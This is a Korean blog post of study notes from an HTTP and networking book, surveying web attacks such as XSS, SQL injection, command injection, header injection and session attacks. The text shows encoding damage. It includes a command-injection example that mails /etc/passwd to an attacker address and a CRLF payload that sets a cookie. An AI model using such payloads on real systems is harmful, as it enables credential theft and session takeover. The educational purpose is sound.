- ์ธํฐ๋ท์์์ ๋ฒ์ด์ง๋ ๊ณต๊ฒฉ์ ๋๋ถ๋ถ์ ์น ์ฌ์ดํธ๋ฅผ ๋ ธ๋ฆฐ ๊ฒ์ด๋ค
- ์น ์ฌ์ดํธ ๊ณต๊ฒฉ์๋ ์ด๋ค ๊ฒ์ด ์๋์ง ๊ทธ๋ฆฌ๊ณ ์ด๋ค ์ํฅ์ ๋ฏธ์น๋์ง์ ๋ํด์ ์์๋ณด์.
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ๋ํ ๊ณต๊ฒฉ ํจํด
- ์๋ฒ๋ฅผ ๋
ธ๋ฆฌ๋ ๋ฅ๋์ ๊ณต๊ฒฉ (active attack)
๊ณต๊ฒฉ์๊ฐ ์ง์ ์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ก์ธ์ค ํด์ ๊ณต๊ฒฉ ์ฝ๋๋ฅผ ๋ณด๋ด๋ ํ์ ์ ๊ณต๊ฒฉ
์๋ฒ ์์ ๋ฆฌ์์ค์ ๋ํด ์ง์ ์คํ๋๊ธฐ ๋๋ฌธ์ ๊ณต๊ฒฉ์๊ฐ ๋ฆฌ์์ค์ ์ก์ธ์ค ํ ํ์๊ฐ ์์
ex) SQL ์ธ์ ์ , OS ์ปค๋งจ๋ ์ธ์ ์ - ์ ์ ๋ฅผ ๋
ธ๋ฆฌ๋ ์๋์ ๊ณต๊ฒฉ (passive attack)
ํจ์ ์ ์ด์ฉํด์ ์ ์ ์๊ฒ ๊ณต๊ฒฉ ์ฝ๋๋ฅผ ์คํ์ํค๋ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์๊ฐ ์ง์ ์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ก์ธ์ค ํด์ ๊ณต๊ฒฉํ์ง ์์
ex) ํฌ๋ก์ค ์ฌ์ดํธ ์คํฌ๋ฆฝํ (XSS, cross-site scripting), ํฌ๋ก์ค ์ฌ์ดํธ ๋ฆฌํ์คํธ ํฌ์ ๋ฆฌ(CSRF, Cross Site Request Forgery)
๐ 1. ์ถ๋ ฅ ๊ฐ์ ์ด์ค์ผ์ดํ ๋ฏธ๋น๋ก ์ธํ ์ทจ์ฝ์ฑ
์ถ๋ ฅ ๊ฐ์ ์ด์ค์ผ์ดํ๊ฐ ๋ฏธ๋นํ ๊ฒฝ์ฐ ๊ณต๊ฒฉ์๊ฐ ๋ณด๋ธ ๊ณต๊ฒฉ ์ฝ๋๊ฐ ์ถ๋ ฅํ๋ ๋์์ ํผํด๋ฅผ ์ ํ ์ ์๋ค
๐ 1. ํฌ๋ก์ค ์ฌ์ดํธ ์คํฌ๋ฆฝํ (XSS, Cross-Site Scripting)
- ์ทจ์ฝ์ฑ์ด ์๋ ์น ์ฌ์ดํธ๋ฅผ ๋ฐฉ๋ฌธํ ์ฌ์ฉ์์ ๋ธ๋ผ์ฐ์ ์์ ๋ถ์ ํ HTML ํ๊ทธ๋ JavaScript ๋ฑ์ ๋์์ํค๋ ๊ณต๊ฒฉ
- ๊ณต๊ฒฉ์๊ฐ ์์ฑํ ์คํฌ๋ฆฝํธ๊ฐ ํจ์ ์ด ๋๊ณ ์ ์ ์ ๋ธ๋ผ์ฐ์ ์์์ ์์ง์ด๋ ์๋์ ๊ณต๊ฒฉ
- ์์
๋ก๊ทธ์ธ ํผ์ ํจ์ ์ ์ค์นํ์ฌ ์ ์ ID์ ํจ์ค์๋ ๋ฑ์ ์ ๋ณด๋ฅผ ํ์ทจํ ์ ์๋ค
์คํฌ๋ฆฝํธ๋ฅผ ์ถ๊ฐํ์ฌ ์ ์ ์ ์ฟ ํค๋ฅผ ๋นผ์์ ์ ์๋ค
๐ 2. SQL ์ธ์ ์ (SQL Injection)
- ์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ด์ฉํ๊ณ ์๋ ๋ฐ์ดํฐ๋ฒ ์ด์ค์ SQL์ ๋ถ์ ํ๊ฒ ์คํํ๋ ๊ณต๊ฒฉ
- ์ปค๋ค๋ ์ํ์ ์ผ์ผํฌ ์ ์๋ ์ทจ์ฝ์ฑ์ผ๋ก ๊ฐ์ธ ์ ๋ณด๋ ๊ธฐ๋ฐ ์ ๋ณด ๋์ค๋ก ์ง๊ฒฐ๋๊ธฐ๋ ํจ
- ์์
'--'๋ฅผ SQL์ ์ถ๊ฐํ์ฌ ์ดํ์ ๊ตฌ๋ฌธ์ ์ฃผ์์ผ๋ก ์ฒ๋ฆฌ๋ฅผ ํ๋ค. ์กฐ๊ฑด์ด ๋ช ํํ๊ฒ ๊ฑธ๋ฆฌ์ง ์์ SQL์ด ๋๊ฐ๊ฒ ๋๋ค
SQL ์ธ์ ์ ์ ํตํ์ฌ ์ ์ ์ ๋ณด๋ ๊ฒฐ์ ์ ๋ณด ๋ฑ์ ๋ค๋ฅธ ํ ์ด๋ธ์ ๋ถ์ ํ๊ณ ์ด๋ํ๊ฑฐ๋ ๋ณ์กฐํ ์ ์๋ค
๐ 3. OS ์ปค๋งจ๋ ์ธ์ ์ (OS Command Injection)
- ์น ์ ํ๋ฆฌ์ผ์ด์ ์ ๊ฒฝ์ ํ์ฌ OS ๋ช ๋ น์ ๋ถ์ ํ๊ฒ ์คํํ๋ ๊ณต๊ฒฉ
- ์์ ํธ์ถํ๋ ํจ์๊ฐ ์๋ ๊ณณ์์ ๋ฐ์ํ ๊ฐ๋ฅ์ฑ์ด ๋๋ค
- ์์
[๊ธฐ์กด] - ์๋์ ๊ฐ์ ๋ฉ์ผ ์ฃผ์๋ก ์ ์ฅ
; cat /etc/passwd | mail hack@example.com
[๋ณ๊ฒฝ] - /etc/passwd ๋ผ๋ Linux์ ๊ณ์ ์ ๋ณด๊ฐ ํฌํจ๋ ํ์ผ์ด hack@example.com์ผ๋ก ๋ฉ์ผ์ด ์ก์
| /user/sbin/sendmail ; cat /etc/passwd | mail hack@example.com
๐ 4. HTTP ํค๋ ์ธ์ ์ (HTTP Header Injection)
- ๊ณต๊ฒฉ์๊ฐ ์๋ต ํค๋ ํ๋์ ๊ฐํ ๋ฌธ์ ๋ฑ์ ์ฝ์ ํจ์ผ๋ก์จ ์์์ ์๋ต ํค๋ ํ๋๋ ๋ฐ๋๋ฅผ ์ถ๊ฐํ๋ ์๋์ ๊ณต๊ฒฉ
- ํนํ ๋ฐ๋๋ฅผ ์ถ๊ฐํ๋ ๊ณต๊ฒฉ์ HTTP ์๋ต ๋ถํ ๊ณต๊ฒฉ (HTTP Response Splitting Attack)์ด๋ผ๊ณ ๋ถ๋ฆ
์๋ฅผ ๋ค์ด, ํด๋ผ์ด์ธํธ๊ฐ ์นดํ ๊ณ ๋ฆฌ๋ฅผ ์ ํํด์ ์์ฒญ์ ๋ณด๋ธ๋ค๊ณ ํ์
[๊ธฐ์กด ์์ฒญ]
http://example.com/?cat=101
[๊ธฐ์กด ์๋ต ํค๋]
Location: http://example.com/?cat=101
[๋ณ๊ฒฝ๋ ์์ฒญ]
http://example.com/?cat=101%0D%0ASet-Cookie:+SID=123456789
[๋ณ๊ฒฝ๋ ์๋ต ํค๋]
Location: http://example.com/?cat=101(%0D%0A : ๊ฐํ๋ฌธ์)
Set-Cookie: SID=123456789
์ฆ, ๊ณต๊ฒฉ์๊ฐ ์ง์ ํ ์์์ ์ฟ ๊ธฐ๊ฐ ์ธํ ๋๋ ์ํฉ์ด ๋ฐ์ํ๋ค
๐ 5. ๋ฉ์ผ ํค๋ ์ธ์ ์ (Mail Header Injection)
- ์น ์ ํ๋ฆฌ์ผ์ด์ ์ ๋ฉ์ผ ์ก์ ๊ธฐ๋ฅ์ ๊ณต๊ฒฉ์๊ฐ ์์์ To ๋ฐ Subject ๋ฑ์ ๋ฉ์ผ ํค๋๋ฅผ ๋ถ์ ํ๊ฒ ์ถ๊ฐํ๋ ๊ณต๊ฒฉ
- ์ทจ์ฝ์ฑ์ด ์๋ ์น ์ฌ์ดํธ๋ฅผ ์ด์ฉํด์ ์คํธ ๋ฉ์ผ์ด๋ ๋ฐ์ด๋ฌ์ค ๋ฉ์ผ ๋ฑ์ ์์์ ์ฃผ์์ ์ก์ ํ ์ ์์
๐ 6. ๋๋ ํ ๋ฆฌ ์ ๊ทผ ๊ณต๊ฒฉ (Directory Traversal)
- ๋น๊ณต๊ฐ ๋๋ ํ ๋ฆฌ ํ์ผ์ ๋ํด์ ๋ถ์ ํ๊ฒ ๋๋ ํ ๋ฆฌ ํจ์ค๋ฅผ ๊ฐ๋ก์ง๋ฌ ์ก์ธ์ค ํ๋ ๊ณต๊ฒฉ
- ํจ์ค ํธ๋๋ฒ์ค(Path Traversal)์ด๋ผ๊ณ ๋ ๋ถ๋ฆ
- ํ์ผ์ ์กฐ์ํ๋ ์ฒ๋ฆฌ์์ ํ์ผ ์ด๋ฆ์ ์ธ๋ถ์์ ์ง์ ํ์ฌ ์์์ ํ์ผ์ด๋ ๋๋ ํ ๋ฆฌ์ ์ก์ธ์ค ํ๋ ๊ฒ
๐ 7. ๋ฆฌ๋ชจํธ ํ์ผ ์ธํด๋ฃจ์ (Remote File Inclusion)
- ์คํฌ๋ฆฝํธ์ ์ผ๋ถ๋ฅผ ๋ค๋ฅธ ํ์ผ์์ ์ฝ์ด์ฌ ๋ ๊ณต๊ฒฉ์๊ฐ ์ง์ ํ ์ธ๋ถ ์๋ฒ์ URL์ ํ์ผ์์ ์ฝ๊ฒ ํจ์ผ๋ก์จ ์์์ ์คํฌ๋ฆฝํธ๋ฅผ ๋์์ํค๋ ๊ณต๊ฒฉ
๐ 2. ์น ์๋ฒ์ ์ค์ ์ด๋ ์ค๊ณ ๋ฏธ๋น๋ก ์ธํ ์ทจ์ฝ์ฑ
์น ์๋ฒ๋ฅผ ์๋ชป ์ค์ ํ๊ฑฐ๋ ์๋ชป ์ค๊ณํ ๋ ์๊ธด ๋ฌธ์ ๋ฑ์ ์ํด ๋ฐ์ํ๋ ์ทจ์ฝ์ฑ
๐ 1. ๊ฐ์ ๋ธ๋ผ์ฐ์ง (Forced Browsing)
- ์น ์๋ฒ์ ๊ณต๊ฐ ๋๋ ํ ๋ฆฌ์ ์๋ ํ์ผ ์ค์์ ๊ณต๊ฐ ์๋๊ฐ ์๋ ํ์ผ์ด ์ด๋๋๊ฒ ๋๋ ์ทจ์ฝ์ฑ
- ๊ณต๊ฐํ๊ณ ์ถ์ง ์์ ํ์ผ์ URL์ ์จ๊ธฐ๋ ๋ณด์ ๋์ฑ ์ ์์กดํ๊ณ ์๋ ๊ฒฝ์ฐ ํด๋น URL์ ์๊ฒ ๋๋ฉด ํ์ผ์ ์ด๋ํ ์ ์์
๐ 2. ๋ถ์ ์ ํ ์๋ฌ ๋ฉ์์ง ์ฒ๋ฆฌ (Error Handling Vulnerability)
- ๊ณต๊ฒฉ์์๊ฒ ์ ์ตํ ์ ๋ณด๊ฐ ์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์๋ฌ ๋ฉ์์ง์ ํฌํจ๋๋ค๋ ์ทจ์ฝ์ฑ
- ์น ์ ํ๋ฆฌ์ผ์ด์ ์์๋ ์ ์ ๊ฐ ๋ณด๊ณ ์๋ ํ๋ฉด์ ์์ธํ ์๋ฌ ๋ฉ์์ง๋ฅผ ํ์ํ ํ์๋ ์๋ค
- ์์ธํ ์๋ฌ ๋ฉ์์ง๋ ๊ณต๊ฒฉ์๊ฐ ๊ณต๊ฒฉ์ ํ๊ธฐ ์ํ ํํธ๊ฐ ๋ ์ ์์
๐ 3. ์คํ ๋ฆฌ๋ค์ด๋ ํธ (Open Redirect)
- ์ง์ ํ ์์์ URL๋ก ๋ฆฌ๋ค์ด๋ ํธ ํ๋ ๊ธฐ๋ฅ
๐ 3. ์ธ์ ๊ด๋ฆฌ ๋ฏธ๋น๋ก ์ธํ ์ทจ์ฝ์ฑ
์ธ์
๊ด๋ฆฌ๋ ์ ์ ์ ์ํ๋ฅผ ๊ด๋ฆฌํ๊ธฐ ์ํ ๊ธฐ๋ฅ์ด๋ค
์ธ์
๊ด๋ฆฌ ๊ธฐ๋ฅ์ด ์ทจ์ฝํ ๊ฒฝ์ฐ ์ ์ ์ธ์ฆ ์ํ๋ฅผ ๋นผ์๊ฒจ ๋ฒ๋ฆฌ๋ ํผํด๊ฐ ๋ฐ์ํ๋ค
๐ 1. ์ธ์ ํ์ด์ฌํน (Session Hijacking)
- ๊ณต๊ฒฉ์๊ฐ ์ด๋ ํ ๋ฐฉ๋ฒ์ผ๋ก ์ ์ ์ ์ธ์ ID๋ฅผ ์ ์ํด์ ์ ์ฉํ๋ ๊ฒ์ผ๋ก, ์ ์ ๋ก ์์ฅํ๋ ๊ณต๊ฒฉ
- ์ ์ ์ ์ธ์ ID๋ฅผ ์ ์ํ ๊ณต๊ฒฉ์๋ ๋ธ๋ผ์ฐ์ ์ ์ฟ ํค์ ์ธ์ ID๋ฅผ ์ธํ ํ๊ณ ์น ์ฌ์ดํธ ์ก์ธ์คํ์ฌ ์ ์ ๋ก ์์ฅํ ์ ์์
๐ 2. ์ธ์ ํฝ์ธ์ด์ (Session Fixation)
- ์ธ์ ํ์ด์ญํน์ด ์ธ์ฆ๋ ์ ์ ์ ์ธ์ ID๋ฅผ ๋นผ์๋ ๊ณต๊ฒฉ์ด๋ผ๋ฉด, ์ธ์ ํฝ์ธ์ด์ ์ ๊ณต๊ฒฉ์๊ฐ ์ง์ ํ ์ธ์ ID๋ฅผ ์ ์ ์๊ฒ ๊ฐ์ ์ ์ผ๋ก ์ฌ์ฉํ๊ฒ ํ๋ ๊ฒ
- ์ธ์ ๊ณ ์ ๊ณต๊ฒฉ์ด๋ผ๊ณ ๋ ๋ถ๋ฆผ
๊ณต๊ฒฉ ๋ฐฉ๋ฒ
- ๊ณต๊ฒฉ์๊ฐ ๊ณต๊ฒฉ์ ์ฌ์ฉํ ์ธ์ ID๋ฅผ ์ค๋นํจ (์์ง ์๋ฒ์์ ์ธ์ฆ ์ ์ํ)
- ์ ์ ๊ฐ ํด๋น ์ธ์ ID๋ฅผ ์ฌ์ฉํ๊ฒ ํ์ฌ ์ธ์ฆ๋ฐ๋๋ก ํจ (์๋ฒ์์ ์ธ์ฆํ๋ ๊ฒ)
- ๊ณต๊ฒฉ์๋ ํด๋น ์ธ์ ID๋ฅผ ์ด์ฉํ์ฌ ์น ์ฌ์ดํธ์ ์ธ์ฆ (์ธ์ฆ๋ ์ธ์ ID๋ฅผ ์ด์ฉํ๋ ๊ฒ)
๐ 3. ํฌ๋ก์ค ์ฌ์ดํธ ๋ฆฌํ์คํธ ํฌ์ ๋ฆฌ (CSRF, Cross-Site Request Forgeries)
- ์ธ์ฆ๋ ์ ์ ๊ฐ ์๋ํ์ง ์๋ ๊ฐ์ธ ์ ๋ณด๋ ์ค์ ์ ๋ณด ๋ฑ์ ๊ณต๊ฒฉ์๊ฐ ์ค์นํด ๋ ํจ์ ์ ์ํด ์ด๋ค ์ํ๋ก ๊ฐฑ์ ํ๋ ์ฒ๋ฆฌ๋ฅผ ๊ฐ์ ๋ก ์คํ์ํค๋ ๊ณต๊ฒฉ
๐ 4. ๊ธฐํ
๐ 1. ํจ์ค์ํฌ ํฌ๋ํน (Password Cracking)
- ํจ์ค์๋๋ฅผ ๋ ผ๋ฆฌ์ ์ผ๋ก ์ด๋์ด๋ด์ ์ธ์ฆ์ ๋ํํ๋ ๊ณต๊ฒฉ
๐ 2. ํด๋ฆญ ์ฌํน (Clickjacking)
- ํฌ๋ช ํ ๋ฒํผ์ด๋ ๋งํฌ๋ฅผ ํจ์ ์ผ๋ก ์ฌ์ฉํ ์น ํ์ด์ง์ ์ฌ์ด ๋๊ณ , ์ ์ ์๊ฒ ๋งํฌ๋ฅผ ํด๋ฆญํ๊ฒ ํจ์ผ๋ก์จ ์๋ํ์ง ์์ ์ฝํ ์ธ ์ ์ก์ธ์ค ์ํค๋ ๊ณต๊ฒฉ
- UI Redressing์ด๋ผ๊ณ ๋ ๋ถ๋ฆผ
๐ 3. DoS ๊ณต๊ฒฉ (Denial of Service attack)
- ์๋น์ค ์ ๊ณต์ ์ ์ง ์ํ๋ก ๋ง๋๋ ๊ณต๊ฒฉ
- ์๋น์ค ์ ์ง ๊ณต๊ฒฉ ๋๋ ์๋น์ค ๊ฑฐ๋ถ ๊ณต๊ฒฉ์ด๋ผ ๋ถ๋ฆผ
- ์ก์ธ์ค๋ฅผ ์ง์ค์ํด์ผ๋ก์จ ๋ถํ๋ฅผ ๊ฑธ์ด ๋ฆฌ์์ค๋ฅผ ๋ค ์๋นํ๊ฒ ํ์ฌ ์ฌ์ค์ ์๋น์ค๋ฅผ ์ ์ง ์ํ๋ก ๋ง๋ ๋ค
- ์ทจ์ฝ์ฑ์ ๊ณต๊ฒฉํด ์๋น์ค๋ฅผ ์ ์ง์ํจ๋ค
๐ 4. ๋ฐฑ๋์ด (Backdoor)
- ์ ํ๋ ๊ธฐ๋ฅ์ ์ ๊ท ์ ์ฐจ๋ฅผ ๋ฐ์ง ์๊ณ ์ด์ฉํ๊ธฐ ์ํด ์ค์น๋ ๋ท๋ฌธ
- ๋ณธ๋ ์ ํด์ง ์ ํ์ ์ด๊ณผํ ๊ธฐ๋ฅ์ ์ด์ฉํ๋ ๊ฒ
'๐ ๊ฐ๋ฐ ์์ > ๊ทธ๋ฆผ์ผ๋ก ๋ฐฐ์ฐ๋ HTTP&Network Basic' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
์ 9์ฅ. HTTP์ ๊ธฐ๋ฅ์ ์ถ๊ฐํ ํ๋กํ ์ฝ (1) | 2023.05.31 |
---|---|
์ 8์ฅ. ๋๊ฐ ์์ธ์คํ๊ณ ์๋์ง๋ฅผ ํ์ธํ๋ ์ธ์ฆ (0) | 2023.05.31 |
์ 7์ฅ. ์น์ ์์ ํ๊ฒ ์ง์ผ์ฃผ๋ HTTPS (0) | 2023.05.31 |
์ 6์ฅ. HTTP ํค๋ (0) | 2023.05.31 |
์ 5์ฅ. HTTP์ ์ฐ๊ณํ๋ ์น ์๋ฒ (0) | 2023.05.31 |